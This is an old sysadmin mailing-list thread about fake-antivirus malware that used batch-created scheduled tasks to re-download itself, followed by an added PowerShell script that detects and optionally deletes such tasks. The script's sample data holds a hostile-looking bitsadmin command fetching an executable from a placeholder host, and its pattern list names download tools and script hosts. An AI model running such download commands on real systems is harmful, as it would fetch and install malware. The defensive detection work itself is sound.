Ever need to deal with "The Coppertop" (Tammy)? She's Sunbelt's malware analyst and is extremely knowledgeable regarding the boot process, what belongs, what does not, what drivers should be loaded and when (i.e., she knows how to spot rootkits), etc.
VIPRE (and CSE) customers have access to her services, and she has helped us clean out some well-hidden crud more than once! Add her services to the reasons to consider VIPRE.

--
Richard D. McClary
Systems Administrator, Information Technology Group
ASPCA
www.aspca.org

"John Aldrich" <[email protected]> wrote on 12/04/2009 09:07:40 AM:

> Yeah, this malware had literally at least a dozen scheduled tasks,
> which makes me think it was probably 1) running at boot/login 2)
> hourly at the very least.
>
> From: Erik Goldoff [mailto:[email protected]]
> Sent: Friday, December 04, 2009 9:54 AM
> To: NT System Admin Issues
> Subject: RE: New virus trick
>
> Saw a similar mechanism used to reinfect Qakbot systems; the scheduled
> task was on a 4-day timer.
>
> Erik Goldoff
> IT Consultant
> Systems, Networks, & Security
>
> From: John Aldrich [mailto:[email protected]]
> Sent: Friday, December 04, 2009 9:39 AM
> To: NT System Admin Issues
> Subject: New virus trick
>
> I was at a seminar yesterday put on by Sunbelt, and during a break I
> had a chance to talk to one of the presenters and told him of a
> recent malware incident I'd cleaned up. He'd never heard of such a
> trick before, so I thought I'd bring it to y'all's attention so you
> can be on the lookout for it. Basically it was the same old malware
> that's been going around with the Antivirus Pro sort of stuff, but
> the twist was that even using Malware Bytes we were not able to get
> rid of it. After I was poking around a bit (I don't recall why I
> was looking at the root of C:, but I was), I noticed a batch file in
> the root of the C: drive that, when I opened it and looked at it,
> created a bunch of scheduled tasks to re-download the
> malware/adware. I wised up and deleted that file, then went into the
> Scheduled Tasks and deleted all the malware-created scheduled tasks.
> Then I was able to successfully clean the stuff out!
>
> What really got us was that Malware Bytes would clean it, then say
> it needed to reboot to finish, and then as soon as we came back, the
> fake antivirus was right back there. What I believe it was doing was
> re-downloading itself from the internet each time we cleaned it. So,
> anyway, if you guys ever have a problem like this, it wouldn't hurt
> to check the scheduled tasks!
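The check John describes (go through Scheduled Tasks for entries the malware created, and remove the batch file in the root of C: that recreates them) can be scripted so it runs the same way on every box. The PowerShell below is an added example written for this page, not code from the thread, from Sunbelt or from any vendor. It parses the verbose CSV output of schtasks.exe (available on XP/2003 as well as later Windows), flags tasks whose command line looks like a download helper, a script host, an in-line URL, or a file sitting directly in a drive root or under a user-writable path, and then lists .bat/.cmd/.vbs files in the root of each drive. The pattern list, the task names and the sample rows are constructed assumptions for the example; without -Live the script runs against those rows so it can be tried offline.

```powershell
# Added example for this thread (not from the original posts or from Sunbelt):
# triage scheduled tasks for the "re-download on a timer" trick described above.
#   .\Find-ReinfectTasks.ps1                 # runs against constructed sample rows
#   .\Find-ReinfectTasks.ps1 -Live           # queries this machine via schtasks.exe
#   .\Find-ReinfectTasks.ps1 -Live -Delete   # also deletes every flagged task
param(
    [switch]$Live,
    [switch]$Delete
)

# Heuristics assumed for the example, not taken from any vendor signature list:
# download helpers, script hosts, in-line URLs, a script or executable sitting
# directly in a drive root (C:\update.bat), or anything under user-writable paths.
$SuspiciousPatterns = @(
    'bitsadmin', 'certutil', 'wget', 'curl', 'ftp ',
    'wscript', 'cscript', 'mshta', 'powershell', 'rundll32',
    'https?://', 'ftp://',
    '^"?[a-z]:\\[^\\"]+\.(bat|cmd|vbs|js|exe)\b',
    '\\temp\\', '\\appdata\\', '\\documents and settings\\', '\\users\\'
)

# Constructed sample in the column layout of "schtasks /query /fo CSV /v"
# (only the columns the script reads). Rows 3 and 4 are benign controls.
$SampleCsv = @'
"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"WS01","At1","C:\update.bat","SYSTEM","Hourly","1 Hour(s)"
"WS01","At2","C:\WINDOWS\system32\wscript.exe //B C:\Documents and Settings\jdoe\Local Settings\Temp\sv.vbs","jdoe","Daily","N/A"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","C:\Windows\system32\defrag.exe -c","SYSTEM","Weekly","N/A"
"WS01","GoogleUpdateTaskMachineUA","C:\Program Files\Google\Update\GoogleUpdate.exe /ua","SYSTEM","Hourly","1 Hour(s)"
"WS01","At3","cmd /c bitsadmin /transfer j http://example.invalid/av.exe C:\av.exe","jdoe","Daily","4 Day(s)"
'@

function Get-TaskRows {
    param([switch]$Live)
    if ($Live) {
        # On Vista and later schtasks repeats the header line once per task folder,
        # so rows whose TaskName is literally "TaskName" are dropped below. Column
        # names are localized on non-English Windows; adjust the property names there.
        $lines = schtasks.exe /query /fo CSV /v 2>$null
    } else {
        $lines = $SampleCsv -split "`r?`n"
    }
    $lines | ConvertFrom-Csv | Where-Object { $_.TaskName -and $_.TaskName -ne 'TaskName' }
}

function Find-SuspiciousTasks {
    param([switch]$Live)
    foreach ($row in (Get-TaskRows -Live:$Live)) {
        $cmd  = [string]$row.'Task To Run'
        $hits = @($SuspiciousPatterns | Where-Object { $cmd -match $_ })
        if ($hits.Count -gt 0) {
            # New-Object rather than [pscustomobject] so this also runs on PowerShell 2.0.
            New-Object PSObject -Property @{
                TaskName = $row.TaskName
                RunAs    = $row.'Run As User'
                Schedule = '{0} / every {1}' -f $row.'Schedule Type', $row.'Repeat: Every'
                Command  = $cmd
                Matched  = ($hits -join ', ')
            }
        }
    }
}

# The batch file in the drive root that recreates the tasks has to go first,
# otherwise the tasks are back the next time it runs.
function Find-DriveRootScripts {
    Get-PSDrive -PSProvider FileSystem | ForEach-Object {
        # Path must end in a wildcard for -Include to apply without -Recurse.
        Get-ChildItem -Path (Join-Path $_.Root '*') -Include *.bat, *.cmd, *.vbs -ErrorAction SilentlyContinue
    }
}

$flagged = @(Find-SuspiciousTasks -Live:$Live)
Write-Host ('{0} scheduled task(s) flagged for review:' -f $flagged.Count)
$flagged | Select-Object TaskName, RunAs, Schedule, Matched, Command | Format-Table -AutoSize -Wrap

if ($Live) {
    Write-Host 'Scripts sitting in drive roots (remove the re-download batch file before the tasks):'
    Find-DriveRootScripts | Select-Object FullName, LastWriteTime
}

if ($Delete -and $Live) {
    foreach ($t in $flagged) {
        # /f suppresses the confirmation prompt; read the table above before using -Delete.
        schtasks.exe /delete /tn $t.TaskName /f
    }
}
```

The heuristics are deliberately loose: a legitimate updater that lives under Program Files and calls no script host passes, while a task that runs a .bat out of C:\ or pulls a URL with bitsadmin is surfaced with the pattern that matched, so the operator can judge it before anything is deleted. Run it with -Live and no -Delete first, clear the batch file in the drive root by hand, and only then remove the tasks; otherwise the next scheduled run recreates what you just deleted, which is exactly the loop John hit with the reboot-and-reinfect cycle.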
